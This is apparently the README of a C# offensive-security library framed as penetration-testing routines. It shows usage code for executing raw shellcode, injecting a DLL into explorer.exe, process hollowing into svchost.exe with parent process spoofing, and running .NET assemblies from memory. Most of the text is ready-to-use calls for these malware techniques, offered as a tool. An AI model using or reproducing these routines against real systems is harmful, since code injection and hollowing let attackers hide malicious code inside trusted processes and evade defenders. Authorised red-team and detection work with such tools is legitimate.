Basic implementations of certain penetration testing routines, such as code injection.
Shellcode
The Shellcode class handles compiled assembly that is typically position independent.
byte[] compiledInstructions = ...;
Shellcode.Execute(compiledInstructions);
To extract the code section from an executable file, use ExtractFromExecutable:
byte[] exeFile = File.ReadAllBytes(@"C:\Windows\explorer.exe");
byte[] textSection = Shellcode.ExtractFromExecutable(exeFile);
DllInjection
To inject a running process with a DLL, use DllInjection.Inject:
using Process process = Process.GetProcessesByName("explorer")[0];
DllInjection.Inject(process, @"C:\path\to\library.dll");
ExecutableInjection
To perform process hollowing, use the RunPE method. An optional parameter enables parent process spoofing.
byte[] exeFile = ...;
int spoofedParentProcessId = ...;
ExecutableInjection.RunPE(@"C:\Windows\System32\svchost.exe", null, exeFile, spoofedParentProcessId);
To load and invoke a .NET executable, use ExecuteDotNetAssembly:
byte[] dotNetExecutable = ...;
ExecutableInjection.ExecuteDotNetAssembly(dotNetExecutable, new[] { "arg1", "arg2" });
- Initial release